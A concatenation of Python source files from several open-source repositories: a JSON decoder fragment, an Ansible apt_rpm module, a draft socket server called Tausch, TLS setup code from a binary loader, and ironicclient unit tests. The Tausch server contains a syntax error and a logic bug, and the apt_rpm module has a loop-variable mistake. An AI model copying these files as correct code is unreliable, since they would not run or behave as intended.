_append = chunks.append
begin = end - 1
while 1:
chunk = _m(s, end)
if chunk is None:
raise ValueError(
errmsg("Unterminated string starting at", s, begin))
end = chunk.end()
content, terminator = chunk.groups()
if content:
if not isinstance(content, unicode):
content = unicode(content, encoding)
_append(content)
if terminator == '"':
break
elif terminator != '\\':
if strict:
raise ValueError(errmsg("Invalid control character %r at", s, end))
else:
_append(terminator)
continue
try:
esc = s[end]
except IndexError:
raise ValueError(
errmsg("Unterminated string starting at", s, begin))
if esc != 'u':
try:
m = _b[esc]
except KeyError:
raise ValueError(
errmsg("Invalid \\escape: %r" % (esc,), s, end))
end += 1
else:
esc = s[end + 1:end + 5]
next_end = end + 5
msg = "Invalid \\uXXXX escape"
try:
if len(esc) != 4:
raise ValueError
uni = int(esc, 16)
if 0xd800 <= uni <= 0xdbff and sys.maxunicode > 65535:
msg = "Invalid \\uXXXX\\uXXXX surrogate pair"
if not s[end + 5:end + 7] == '\\u':
raise ValueError
esc2 = s[end + 7:end + 11]
if len(esc2) != 4:
raise ValueError
uni2 = int(esc2, 16)
uni = 0x10000 + (((uni - 0xd800) << 10) | (uni2 - 0xdc00))
next_end += 6
m = unichr(uni)
except ValueError:
raise ValueError(errmsg(msg, s, end))
end = next_end
_append(m)
return u''.join(chunks), end
# Use speedup if available
scanstring = c_scanstring or py_scanstring
WHITESPACE = re.compile(r'[ \t\n\r]*', FLAGS)
WHITESPACE_STR = ' \t\n\r'
def JSONObject((s, end), encoding, strict, scan_once, object_hook, _w=WHITESPACE.match, _ws=WHITESPACE_STR):
pairs = {}
nextchar = s[end:end + 1]
# Normally we expect nextchar == '"'
if nextchar != '"':
if nextchar in _ws:
end = _w(s, end).end()
nextchar = s[end:end + 1]
# Trivial empty object
if nextchar == '}':
return pairs, end + 1
elif nextchar != '"':
raise ValueError(errmsg("Expecting property name", s, end))
end += 1
while True:
key, end = scanstring(s, end, encoding, strict)
# To skip some function call overhead we optimize the fast paths where
# the JSON key separator is ": " or just ":".
if s[end:end + 1] != ':':
end = _w(s, end).end()
if s[end:end + 1] != ':':
raise ValueError(errmsg("Expecting : delimiter", s, end))
end += 1
try:
if s[end] in _ws:
end += 1
if s[end] in _ws:
end = _w(s, end + 1).end()
except IndexError:
pass
try:
value, end = scan_once(s, end)
except StopIteration:
raise ValueError(errmsg("Expecting object", s, end))
pairs[key] = value
try:
nextchar = s[end]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end]
except IndexError:
nextchar = ''
end += 1
if nextchar == '}':
break
elif nextchar != ',':
raise ValueError(errmsg("Expecting , delimiter", s, end - 1))
try:
nextchar = s[end]
if nextchar in _ws:
end += 1
nextchar = s[end]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end]
except IndexError:
nextchar = ''
end += 1
if nextchar != '"':
raise ValueError(errmsg("Expecting property name", s, end - 1))
if object_hook is not None:
pairs = object_hook(pairs)
return pairs, end
def JSONArray((s, end), scan_once, _w=WHITESPACE.match, _ws=WHITESPACE_STR):
values = []
nextchar = s[end:end + 1]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end:end + 1]
# Look-ahead for trivial empty array
if nextchar == ']':
return values, end + 1
_append = values.append
while True:
try:
value, end = scan_once(s, end)
except StopIteration:
raise ValueError(errmsg("Expecting object", s, end))
_append(value)
nextchar = s[end:end + 1]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end:end + 1]
end += 1
if nextchar == ']':
break
elif nextchar != ',':
raise ValueError(errmsg("Expecting , delimiter", s, end))
try:
if s[end] in _ws:
end += 1
if s[end] in _ws:
end = _w(s, end + 1).end()
except IndexError:
pass
return values, end
class JSONDecoder(object):
"""Simple JSON <http://json.org> decoder
Performs the following translations in decoding by default:
+---------------+-------------------+
| JSON | Python |
+===============+===================+
| object | dict |
+---------------+-------------------+
| array | list |
+---------------+-------------------+
| string | unicode |
+---------------+-------------------+
| number (int) | int, long |
+---------------+-------------------+
| number (real) | float |
+---------------+-------------------+
| true | True |
+---------------+-------------------+
| false | False |
+---------------+-------------------+
| null | None |
+---------------+-------------------+
It also understands ``NaN``, ``Infinity``, and ``-Infinity`` as
their corresponding ``float`` values, which is outside the JSON spec.
"""
def __init__(self, encoding=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, strict=True):
"""``encoding`` determines the encoding used to interpret any ``str``
objects decoded by this instance (utf-8 by default). It has no
effect when decoding ``unicode`` objects.
Note that currently only encodings that are a superset of ASCII work,
strings of other encodings should be passed in as ``unicode``.
``object_hook``, if specified, will be called with the result
of every JSON object decoded and its return value will be used in
place of the given ``dict``. This can be used to provide custom
deserializations (e.g. to support JSON-RPC class hinting).
``parse_float``, if specified, will be called with the string
of every JSON float to be decoded. By default this is equivalent to
float(num_str). This can be used to use another datatype or parser
for JSON floats (e.g. decimal.Decimal).
``parse_int``, if specified, will be called with the string
of every JSON int to be decoded. By default this is equivalent to
int(num_str). This can be used to use another datatype or parser
for JSON integers (e.g. float).
``parse_constant``, if specified, will be called with one of the
following strings: -Infinity, Infinity, NaN.
This can be used to raise an exception if invalid JSON numbers
are encountered.
"""
self.encoding = encoding
self.object_hook = object_hook
self.parse_float = parse_float or float
self.parse_int = parse_int or int
self.parse_constant = parse_constant or _CONSTANTS.__getitem__
self.strict = strict
self.parse_object = JSONObject
self.parse_array = JSONArray
self.parse_string = scanstring
self.scan_once = make_scanner(self)
def decode(self, s, _w=WHITESPACE.match):
"""Return the Python representation of ``s`` (a ``str`` or ``unicode``
instance containing a JSON document)
"""
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
end = _w(s, end).end()
if end != len(s):
raise ValueError(errmsg("Extra data", s, end, len(s)))
return obj
def raw_decode(self, s, idx=0):
"""Decode a JSON document from ``s`` (a ``str`` or ``unicode`` beginning
with a JSON document) and return a 2-tuple of the Python
representation and the index in ``s`` where the document ended.
This can be used to decode a JSON document from a string that may
have extraneous data at the end.
"""
try:
obj, end = self.scan_once(s, idx)
except StopIteration:
raise ValueError("No JSON object could be decoded")
return obj, end
|
simonwydooghe/ansible
|
refs/heads/devel
|
lib/ansible/modules/packaging/os/apt_rpm.py
|
79
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2013, Evgenii Terechkov
# Written by Evgenii Terechkov <evg@altlinux.org>
# Based on urpmi module written by Philippe Makowski <philippem@mageia.org>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: apt_rpm
short_description: apt_rpm package manager
description:
- Manages packages with I(apt-rpm). Both low-level (I(rpm)) and high-level (I(apt-get)) package manager binaries required.
version_added: "1.5"
options:
pkg:
description:
- name of package to install, upgrade or remove.
required: true
state:
description:
- Indicates the desired package state.
choices: [ absent, present ]
default: present
update_cache:
description:
- update the package database first C(apt-get update).
type: bool
default: 'no'
author:
- Evgenii Terechkov (@evgkrsk)
'''
EXAMPLES = '''
- name: Install package foo
apt_rpm:
pkg: foo
state: present
- name: Remove package foo
apt_rpm:
pkg: foo
state: absent
- name: Remove packages foo and bar
apt_rpm:
pkg: foo,bar
state: absent
# bar will be the updated if a newer version exists
- name: Update the package database and install bar
apt_rpm:
name: bar
state: present
update_cache: yes
'''
import json
import os
import shlex
import sys
from ansible.module_utils.basic import AnsibleModule
APT_PATH = "/usr/bin/apt-get"
RPM_PATH = "/usr/bin/rpm"
def query_package(module, name):
# rpm -q returns 0 if the package is installed,
# 1 if it is not installed
rc, out, err = module.run_command("%s -q %s" % (RPM_PATH, name))
if rc == 0:
return True
else:
return False
def query_package_provides(module, name):
# rpm -q returns 0 if the package is installed,
# 1 if it is not installed
rc, out, err = module.run_command("%s -q --provides %s" % (RPM_PATH, name))
return rc == 0
def update_package_db(module):
rc, out, err = module.run_command("%s update" % APT_PATH)
if rc != 0:
module.fail_json(msg="could not update package db: %s" % err)
def remove_packages(module, packages):
remove_c = 0
# Using a for loop in case of error, we can report the package that failed
for package in packages:
# Query the package first, to see if we even need to remove
if not query_package(module, package):
continue
rc, out, err = module.run_command("%s -y remove %s" % (APT_PATH, package))
if rc != 0:
module.fail_json(msg="failed to remove %s: %s" % (package, err))
remove_c += 1
if remove_c > 0:
module.exit_json(changed=True, msg="removed %s package(s)" % remove_c)
module.exit_json(changed=False, msg="package(s) already absent")
def install_packages(module, pkgspec):
packages = ""
for package in pkgspec:
if not query_package_provides(module, package):
packages += "'%s' " % package
if len(packages) != 0:
rc, out, err = module.run_command("%s -y install %s" % (APT_PATH, packages))
installed = True
for packages in pkgspec:
if not query_package_provides(module, package):
installed = False
# apt-rpm always have 0 for exit code if --force is used
if rc or not installed:
module.fail_json(msg="'apt-get -y install %s' failed: %s" % (packages, err))
else:
module.exit_json(changed=True, msg="%s present(s)" % packages)
else:
module.exit_json(changed=False)
def main():
module = AnsibleModule(
argument_spec=dict(
state=dict(type='str', default='installed', choices=['absent', 'installed', 'present', 'removed']),
update_cache=dict(type='bool', default=False, aliases=['update-cache']),
package=dict(type='str', required=True, aliases=['name', 'pkg']),
),
)
if not os.path.exists(APT_PATH) or not os.path.exists(RPM_PATH):
module.fail_json(msg="cannot find /usr/bin/apt-get and/or /usr/bin/rpm")
p = module.params
if p['update_cache']:
update_package_db(module)
packages = p['package'].split(',')
if p['state'] in ['installed', 'present']:
install_packages(module, packages)
elif p['state'] in ['absent', 'removed']:
remove_packages(module, packages)
if __name__ == '__main__':
main()
|
petersn/tausch
|
refs/heads/master
|
tausch_server.py
|
1
|
#! /usr/bin/python
"""
Tausch server.
"""
handshake_string = "tausch\1\0\0\0"
import SocketServer, traceback, socket, threading, os, time, struct, json, Queue, random, logging
rng = random.SystemRandom()
# This lock synchronizes access to the Context.
main_lock = threading.Lock()
class Context:
config = {
# Round length in seconds.
"interval": 60.0,
}
def __init__(self):
self.users = set()
self.start_time = time.time()
def get_general_info(self):
return {
"users": len(self.users),
"time": time.time(),
"start_time": self.start_time,
"config": self.config,
}
def new_user(self, handler):
print "New user:", handler
self.users.add(handler)
def del_user(self, handler):
print "Del user:", handler
self.users.remove(handler)
def get_workload(self, handler):
return ""
def put_workload(self, handler, dataset):
print "Work completed."
def begin_new_round(self):
# Compute the workloads for each stream.
# These lists of selectors are indexed by stream.
self.workload_by_uuid = {}
for user in self.users:
for index, sub in user.subscriptions.iteritems():
for uuid, selector in sub.iteritems():
if uuid not in self.workload_by_uuid:
self.workload_by_uuid = []
self.workload_by_uuid[uuid].append((user, index, selector))
class Stream:
def __init__(self):
self.blocks = []
class Subscription:
def __init__(self):
self.blocks = []
self.selectors = {}
ctx = Context()
class CoordinatorThread(threading.Thread):
def run(self):
while True:
time.sleep(1)
with main_lock:
ctx.begin_new_round()
# If the workload is empty, wait.
if ctx.workload_by_uuid
time.sleep(100)
CoordinatorThread().start()
class TauschServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
allow_reuse_address = True
class TauschHandler(SocketServer.StreamRequestHandler):
def handle(self):
# Perform the handshake.
self.send(handshake_string)
reply = self.rfile.read(len(handshake_string))
if reply != handshake_string:
return
# Basic user information.
self.balance = 0.0
self.trust = 0.0
self.config = {
"max_conns": 0,
"max_opers": 0,
"tune_opers_per_conn": 1.0,
# "short_tag": "",
# "long_tag": "",
}
self.streams = {}
self.subscriptions = {}
# Reset all cached user state.
self.cmd_amnesia()
# Report ourself to Context.
with main_lock:
ctx.new_user(self)
command_dispatch = {
"a": self.cmd_user_info,
"b": self.cmd_general_info,
"c": self.cmd_get_stream_updates,
"d": self.cmd_amnesia,
"e": self.cmd_set_var,
"f": self.cmd_get_var,
"g": self.cmd_new_stream,
"h": self.cmd_del_stream,
"i": self.cmd_new_subscription,
"j": self.cmd_del_subscription,
"k": self.cmd_set_selector,
"l": self.cmd_get_workload,
"m": self.cmd_put_workload,
"n": self.cmd_block_to_stream,
"o": self.cmd_blocks_from_subscription,
}
# Begin processing commands.
self.good = True
while self.good:
command = self.rfile.read(1)
if command not in command_dispatch:
return
command_dispatch[command]()
def finish(self):
with main_lock:
ctx.del_user(self)
def send(self, s):
self.wfile.write(s)
self.wfile.flush()
def send_blob(self, s):
if not isinstance(s, str):
s = json.dumps(s)
self.send(self.length_encode(s))
def length_encode(self, s):
return struct.pack("<I", len(s)) + s
def get_blob(self, maxlen):
length, = struct.unpack("<I", self.rfile.read(4))
if length > maxlen:
print "Lengths:", length, maxlen
print "Protocol violation."
self.good = False
return
return self.rfile.read(length)
def cmd_user_info(self):
with main_lock:
s = json.dumps({
"balance": self.balance,
"config": self.config,
"streams": self.streams.keys(),
"subscriptions": [(k, len(v.blocks)) for k, v in self.subscriptions.iteritems()],
})
self.send_blob(s)
def cmd_general_info(self):
with main_lock:
info = ctx.get_general_info()
self.send_blob(info)
def cmd_get_stream_updates(self):
with main_lock:
new_streams = set()
for user in ctx.users:
new_streams.update(user.streams.iterkeys())
diffs = []
# Find the deleted streams.
for stream in self.known_streams:
if stream not in new_streams:
diffs.append("d" + stream.decode("hex"))
# Find the new streams.
for stream in new_streams:
if stream not in self.known_streams:
diffs.append("a" + stream.decode("hex"))
# Update our cache.
self.known_streams = new_streams
# Send the user the list of diffs.
s = "".join(diffs)
self.send_blob(s)
def cmd_amnesia(self):
self.known_streams = set()
def cmd_set_var(self):
var = self.get_blob(16)
value = self.get_blob(8192)
success = var in self.config
if success:
# Attempt to cast the value to the appropriate type.
try:
self.config[var] = type(self.config[var])(value)
except ValueError:
success = False
self.send_blob("01"[success])
def cmd_get_var(self):
var = self.get_blob(16)
value = str(self.config.get(var, ""))
self.send_blob(value)
def cmd_new_stream(self):
raw_uuid = os.urandom(20)
uuid = raw_uuid.encode("hex")
with main_lock:
self.streams[uuid] = Stream()
self.send_blob(raw_uuid)
def cmd_del_stream(self):
uuid = self.get_blob(20).encode("hex")
with main_lock:
self.send_blob("01"[uuid in self.streams])
if uuid in self.streams:
self.streams.pop(uuid)
def cmd_new_subscription(self):
index = len(self.subscriptions)
self.subscriptions[index] = Subscription()
self.send_blob(struct.pack("<I", index))
def cmd_del_subscription(self):
s = self.get_blob(4)
if len(s) != 4:
print "Protocol violation."
self.good = False
return
index, = struct.unpack("<I", s)
with main_lock:
self.send_blob("01"[index in self.subscriptions])
if index in self.subscriptions:
self.subscriptions.pop(index)
def cmd_set_selector(self):
s, raw_uuid = self.get_blob(4), self.get_blob(20)
if len(s) != 4 or len(raw_uuid) != 20:
print "Protocol violation."
self.good = False
return
index, = struct.unpack("<I", s)
uuid = raw_uuid.encode("hex")
selector = self.get_blob(4096)
with main_lock:
flag = index in self.subscriptions and \
uuid in self.known_streams
self.send_blob("01"[flag])
if flag:
self.subscriptions[index].selectors[uuid] = selector
def cmd_get_workload(self):
with main_lock:
workload = ctx.get_workload(self)
self.send_blob(workload)
def cmd_put_workload(self):
dataset = self.get_blob(2**20)
with main_lock:
success = ctx.put_workload(self, dataset)
self.send_blob("01"[success])
def cmd_block_to_stream(self):
raw_uuid = self.get_blob(20)
if len(raw_uuid) != 20:
print "Protocol violation."
self.good = False
return
uuid = raw_uuid.encode("hex")
block = self.get_blob(4096)
with main_lock:
self.send_blob("01"[uuid in self.streams])
if uuid in self.streams:
self.streams[uuid].blocks.append(block)
def cmd_blocks_from_subscription(self):
s = self.get_blob(4)
if len(s) != 4:
print "Protocol violation."
self.good = False
return
index, = struct.unpack("<I", s)
with main_lock:
self.send_blob("01"[index in self.subscriptions])
if index in self.subscriptions:
sub = self.subscriptions[index]
s = "".join(map(self.length_encode, sub.blocks))
sub.blocks = []
self.send_blob(s)
HOST = ""
PORT = 50506
TauschServer((HOST, PORT), TauschHandler).serve_forever()
|
pewpewsecure/cle
|
refs/heads/master
|
cle/tls.py
|
1
|
from collections import namedtuple, defaultdict
import struct
from .backends import Backend
from .memory import Clemory
TLSArchInfo = namedtuple('TLSArchInfo', ('variant', 'tcbhead_size', 'head_offsets', 'dtv_offsets', 'pthread_offsets'))
tls_archinfo = {
'AMD64': TLSArchInfo( 2, 704, [16], [8], [0] ),
'X86': TLSArchInfo( 2, 56, [8], [4], [0] ),
'AARCH64': TLSArchInfo( 1, 32, [], [0], [] ),
'ARM': TLSArchInfo( 1, 32, [], [0], [] ),
'ARMEL': TLSArchInfo( 1, 8, [], [0], [] ),
'ARMHF': TLSArchInfo( 1, 8, [], [0], [] ),
'MIPS32': TLSArchInfo( 1, 8, [], [0], [] ),
'MIPS64': TLSArchInfo( 1, 16, [], [0], [] ),
'PPC32': TLSArchInfo( 1, 52, [], [48], [] ),
'PPC64': TLSArchInfo( 1, 92, [], [84], [] ),
}
TLS_BLOCK_ALIGN = 0x10
TLS_TOTAL_HEAD_SIZE = 0x4000
TLS_HEAD_ALIGN = 0x10000
TLS_DTV_INITIAL_CAPACITY = 0x10
TLS_ALLOC_SIZE = 0x30000
def roundup(val, to=TLS_BLOCK_ALIGN):
#val -= 1
#diff = to - (val % to)
#val += diff
#return val
return val - 1 + (to - ((val - 1) % to))
class TLSObj(Backend):
def __init__(self, modules):
super(TLSObj, self).__init__('##cle_tls##')
self.modules = modules
self.arch = self.modules[0].arch
self.memory = Clemory(self.arch)
self.tlsinfo = tls_archinfo[self.arch.name]
module_id = 1
self.total_blocks_size = 0
for module in modules:
module.tls_module_id = module_id
module_id += 1
module.tls_block_offset = self.total_blocks_size
self.total_blocks_size += roundup(module.tls_block_size)
self.total_blocks_size = roundup(self.total_blocks_size, TLS_HEAD_ALIGN)
for module in modules:
if self.tlsinfo.variant == 1:
module.tls_block_offset += TLS_TOTAL_HEAD_SIZE
else:
module.tls_block_offset = -roundup(module.tls_block_size) - module.tls_block_offset
self.dtv_start = TLS_TOTAL_HEAD_SIZE + 2*self.arch.bytes
self.tp_offset = 0 if self.tlsinfo.variant == 1 else self.total_blocks_size
def finalize(self):
assert self.rebase_addr != 0
temp_dict = defaultdict(lambda: '\0')
def drop(string, offset):
for i, c in enumerate(string):
temp_dict[i + offset] = c
def drop_int(num, offset):
drop(struct.pack(self.arch.struct_fmt(), num), offset)
# Set the appropriate pointers in the tcbhead
for off in self.tlsinfo.head_offsets:
drop_int(self.thread_pointer, off + self.tp_offset)
for off in self.tlsinfo.dtv_offsets:
drop_int(self.rebase_addr + self.dtv_start, off + self.tp_offset)
for off in self.tlsinfo.pthread_offsets:
drop_int(self.thread_pointer, off + self.tp_offset) # ?????
# Write the init images from each of the modules' tdata sections
for module in self.modules:
module.memory.seek(module.tls_tdata_start)
drop(module.memory.read(module.tls_tdata_size), self.tp_offset + module.tls_block_offset)
# Set up the DTV
# TODO: lmao capacity it's 2:30am please help me
drop_int(TLS_DTV_INITIAL_CAPACITY-1, self.dtv_start - 2*self.arch.bytes)
drop_int(len(self.modules), self.dtv_start)
for module in self.modules:
drop_int(self.tp_offset + module.tls_block_offset, self.dtv_start + (2*self.arch.bytes)*module.tls_module_id)
drop_int(1, self.dtv_start + (2*self.arch.bytes)*module.tls_module_id + self.arch.bytes)
self.memory.add_backer(0, ''.join(temp_dict[i] for i in xrange(0, TLS_ALLOC_SIZE)))
@property
def thread_pointer(self):
return self.rebase_addr + self.tp_offset
def get_min_addr(self):
return self.rebase_addr
def get_max_addr(self):
return TLS_ALLOC_SIZE + self.rebase_addr
def get_addr(self, module_id, offset):
'''
basically __tls_get_addr
'''
return self.thread_pointer + self.modules[module_id-1].tls_block_offset + offset
|
NaohiroTamura/python-ironicclient
|
refs/heads/master
|
ironicclient/tests/unit/test_client.py
|
1
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from keystoneauth1 import loading as kaloading
from ironicclient import client as iroclient
from ironicclient.common import filecache
from ironicclient.common import http
from ironicclient import exc
from ironicclient.tests.unit import utils
from ironicclient.v1 import client as v1
class ClientTest(utils.BaseTestCase):
def test_get_client_with_auth_token_ironic_url(self):
kwargs = {
'ironic_url': 'http://ironic.example.org:6385/',
'os_auth_token': 'USER_AUTH_TOKEN',
}
client = iroclient.get_client('1', **kwargs)
self.assertEqual('USER_AUTH_TOKEN', client.http_client.auth_token)
self.assertEqual('http://ironic.example.org:6385/',
client.http_client.endpoint)
@mock.patch.object(filecache, 'retrieve_data', autospec=True)
@mock.patch.object(kaloading.session, 'Session', autospec=True)
@mock.patch.object(kaloading, 'get_plugin_loader', autospec=True)
def _test_get_client(self, mock_ks_loader, mock_ks_session,
mock_retrieve_data, version=None,
auth='password', **kwargs):
session = mock_ks_session.return_value.load_from_options.return_value
session.get_endpoint.return_value = 'http://localhost:6385/v1/f14b4123'
mock_ks_loader.return_value.load_from_options.return_value = 'auth'
mock_retrieve_data.return_value = version
client = iroclient.get_client('1', **kwargs)
mock_ks_loader.assert_called_once_with(auth)
mock_ks_session.return_value.load_from_options.assert_called_once_with(
auth='auth', timeout=kwargs.get('timeout'),
insecure=kwargs.get('insecure'), cert=kwargs.get('cert'),
cacert=kwargs.get('cacert'), key=kwargs.get('key'))
session.get_endpoint.assert_called_once_with(
service_type=kwargs.get('os_service_type') or 'baremetal',
interface=kwargs.get('os_endpoint_type') or 'publicURL',
region_name=kwargs.get('os_region_name'))
if 'os_ironic_api_version' in kwargs:
self.assertEqual(0, mock_retrieve_data.call_count)
else:
mock_retrieve_data.assert_called_once_with(
host='localhost',
port='6385')
self.assertEqual(version or v1.DEFAULT_VER,
client.http_client.os_ironic_api_version)
def test_get_client_no_auth_token(self):
kwargs = {
'os_tenant_name': 'TENANT_NAME',
'os_username': 'USERNAME',
'os_password': 'PASSWORD',
'os_auth_url': 'http://localhost:35357/v2.0',
'os_auth_token': '',
}
self._test_get_client(**kwargs)
def test_get_client_service_and_endpoint_type_defaults(self):
kwargs = {
'os_tenant_name': 'TENANT_NAME',
'os_username': 'USERNAME',
'os_password': 'PASSWORD',
'os_auth_url': 'http://localhost:35357/v2.0',
'os_auth_token': '',
'os_service_type': '',
'os_endpoint_type': ''
}
self._test_get_client(**kwargs)
def test_get_client_with_region_no_auth_token(self):
kwargs = {
'os_tenant_name': 'TENANT_NAME',
'os_username': 'USERNAME',
'os_password': 'PASSWORD',
'os_region_name': 'REGIONONE',
'os_auth_url': 'http://localhost:35357/v2.0',
'os_auth_token': '',
}
self._test_get_client(**kwargs)
def test_get_client_no_url(self):
kwargs = {
'os_tenant_name': 'TENANT_NAME',
'os_username': 'USERNAME',
'os_password': 'PASSWORD',
'os_auth_url': '',
}
self.assertRaises(exc.AmbiguousAuthSystem, iroclient.get_client,
'1', **kwargs)
# test the alias as well to ensure backwards compatibility
self.assertRaises(exc.AmbigiousAuthSystem, iroclient.get_client,
'1', **kwargs)
def test_get_client_incorrect_auth_params(self):
kwargs = {
'os_tenant_name': 'TENANT_NAME',
'os_username': 'USERNAME',
'os_auth_url': 'http://localhost:35357/v2.0',
}
self.assertRaises(exc.AmbiguousAuthSystem, iroclient.get_client,
'1', **kwargs)
def test_get_client_with_api_version_latest(self):
kwargs = {
'os_tenant_name': 'TENANT_NAME',
'os_username': 'USERNAME',
'os_password': 'PASSWORD',
'os_auth_url': 'http://localhost:35357/v2.0',
'os_auth_token': '',
'os_ironic_api_version': "latest",
}
self._test_get_client(**kwargs)
def test_get_client_with_api_version_numeric(self):
kwargs = {
'os_tenant_name': 'TENANT_NAME',
'os_username': 'USERNAME',
'os_password': 'PASSWORD',
'os_auth_url': 'http://localhost:35357/v2.0',
'os_auth_token': '',
'os_ironic_api_version': "1.4",
}
self._test_get_client(**kwargs)
def test_get_client_default_version_set_cached(self):
version = '1.3'
# Make sure we don't coincidentally succeed
self.assertNotEqual(v1.DEFAULT_VER, version)
kwargs = {
'os_tenant_name': 'TENANT_NAME',
'os_username': 'USERNAME',
'os_password': 'PASSWORD',
'os_auth_url': 'http://localhost:35357/v2.0',
'os_auth_token': '',
}
self._test_get_client(version=version, **kwargs)
def test_get_client_with_auth_token(self):
kwargs = {
'os_auth_url': 'http://localhost:35357/v2.0',
'os_auth_token': 'USER_AUTH_TOKEN',
}
self._test_get_client(auth='token', **kwargs)
def test_get_client_with_region_name_auth_token(self):
kwargs = {
'os_auth_url': 'http://localhost:35357/v2.0',
'os_region_name': 'REGIONONE',
'os_auth_token': 'USER_AUTH_TOKEN',
}
self._test_get_client(auth='token', **kwargs)
def test_get_client_only_session_passed(self):
session = mock.Mock()
session.get_endpoint.return_value = 'http://localhost:35357/v2.0'
kwargs = {
'session': session,
}
iroclient.get_client('1', **kwargs)
session.get_endpoint.assert_called_once_with(service_type='baremetal',
interface='publicURL',
region_name=None)
def test_get_client_incorrect_session_passed(self):
session = mock.Mock()
session.get_endpoint.side_effect = Exception('boo')
kwargs = {
'session': session,
}
self.assertRaises(exc.AmbiguousAuthSystem, iroclient.get_client,
'1', **kwargs)
@mock.patch.object(kaloading.session, 'Session', autospec=True)
@mock.patch.object(kaloading, 'get_plugin_loader', autospec=True)
def _test_loader_arguments_passed_correctly(
self, mock_ks_loader, mock_ks_session,
passed_kwargs, expected_kwargs):
session = mock_ks_session.return_value.load_from_options.return_value
session.get_endpoint.return_value = 'http://localhost:6385/v1/f14b4123'
mock_ks_loader.return_value.load_from_options.return_value = 'auth'
iroclient.get_client('1', **passed_kwargs)
mock_ks_loader.return_value.load_from_options.assert_called_once_with(
**expected_kwargs)
mock_ks_session.return_value.load_from_options.assert_called_once_with(
auth='auth', timeout=passed_kwargs.get('timeout'),
insecure=passed_kwargs.get('insecure'),
cert=passed_kwargs.get('cert'),
cacert=passed_kwargs.get('cacert'), key=passed_kwargs.get('key'))
session.get_endpoint.assert_called_once_with(
service_type=passed_kwargs.get('os_service_type') or 'baremetal',
interface=passed_kwargs.get('os_endpoint_type') or 'publicURL',
region_name=passed_kwargs.get('os_region_name'))
def test_loader_arguments_token(self):
passed_kwargs = {
'os_auth_url': 'http://localhost:35357/v3',
'os_region_name': 'REGIONONE',
'os_auth_token': 'USER_AUTH_TOKEN',
}
expected_kwargs = {
'auth_url': 'http://localhost:35357/v3',
'project_id': None,
'project_name': None,
'user_domain_id': None,
'user_domain_name': None,
'project_domain_id': None,
'project_domain_name': None,
'token': 'USER_AUTH_TOKEN'
}
self._test_loader_arguments_passed_correctly(
passed_kwargs=passed_kwargs, expected_kwargs=expected_kwargs)
def test_loader_arguments_password_tenant_name(self):
passed_kwargs = {
'os_auth_url': 'http://localhost:35357/v3',
'os_region_name': 'REGIONONE',
'os_tenant_name': 'TENANT',
'os_username': 'user',
'os_password': '1234',
'os_project_domain_id': 'DEFAULT',
'os_user_domain_id': 'DEFAULT'
}
expected_kwargs = {
'auth_url': 'http://localhost:35357/v3',
'project_id': None,
'project_name': 'TENANT',
'user_domain_id': 'DEFAULT',
'user_domain_name': None,
'project_domain_id': 'DEFAULT',
'project_domain_name': None,
'username': 'user',
'password': '1234'
}
self._test_loader_arguments_passed_correctly(
passed_kwargs=passed_kwargs, expected_kwargs=expected_kwargs)
def test_loader_arguments_password_project_id(self):
passed_kwargs = {
'os_auth_url': 'http://localhost:35357/v3',
'os_region_name': 'REGIONONE',
'os_project_id': '1000',
'os_username': 'user',
'os_password': '1234',
'os_project_domain_name': 'domain1',
'os_user_domain_name': 'domain1'
}
expected_kwargs = {
'auth_url': 'http://localhost:35357/v3',
'project_id': '1000',
'project_name': None,
'user_domain_id': None,
'user_domain_name': 'domain1',
'project_domain_id': None,
'project_domain_name': 'domain1',
'username': 'user',
'password': '1234'
}
self._test_loader_arguments_passed_correctly(
passed_kwargs=passed_kwargs, expected_kwargs=expected_kwargs)
@mock.patch.object(iroclient, 'Client')
@mock.patch.object(kaloading.session, 'Session', autospec=True)
def test_correct_arguments_passed_to_client_constructor_noauth_mode(
self, mock_ks_session, mock_client):
kwargs = {
'ironic_url': 'http://ironic.example.org:6385/',
'os_auth_token': 'USER_AUTH_TOKEN',
'os_ironic_api_version': 'latest',
'insecure': True,
'max_retries': 10,
'retry_interval': 10,
'os_cacert': 'data'
}
iroclient.get_client('1', **kwargs)
mock_client.assert_called_once_with(
'1', 'http://ironic.example.org:6385/',
**{
'os_ironic_api_version': 'latest',
'max_retries': 10,
'retry_interval': 10,
'token': 'USER_AUTH_TOKEN',
'insecure': True,
'ca_file': 'data',
'cert_file': None,
'key_file': None,
'timeout': None,
'session': None
}
)
self.assertFalse(mock_ks_session.called)
@mock.patch.object(iroclient, 'Client')
@mock.patch.object(kaloading.session, 'Session', autospec=True)
def test_correct_arguments_passed_to_client_constructor_session_created(
self, mock_ks_session, mock_client):
session = mock_ks_session.return_value.load_from_options.return_value
kwargs = {
'os_auth_url': 'http://localhost:35357/v3',
'os_region_name': 'REGIONONE',
'os_project_id': '1000',
'os_username': 'user',
'os_password': '1234',
'os_project_domain_name': 'domain1',
'os_user_domain_name': 'domain1'
}
iroclient.get_client('1', **kwargs)
mock_client.assert_called_once_with(
'1', session.get_endpoint.return_value,
**{
'os_ironic_api_version': None,
'max_retries': None,
'retry_interval': None,
'session': session,
}
)
@mock.patch.object(iroclient, 'Client')
@mock.patch.object(kaloading.session, 'Session', autospec=True)
def test_correct_arguments_passed_to_client_constructor_session_passed(
self, mock_ks_session, mock_client):
session = mock.Mock()
kwargs = {
'session': session,
}
iroclient.get_client('1', **kwargs)
mock_client.assert_called_once_with(
'1', session.get_endpoint.return_value,
**{
'os_ironic_api_version': None,
'max_retries': None,
'retry_interval': None,
'session': session,
}
)
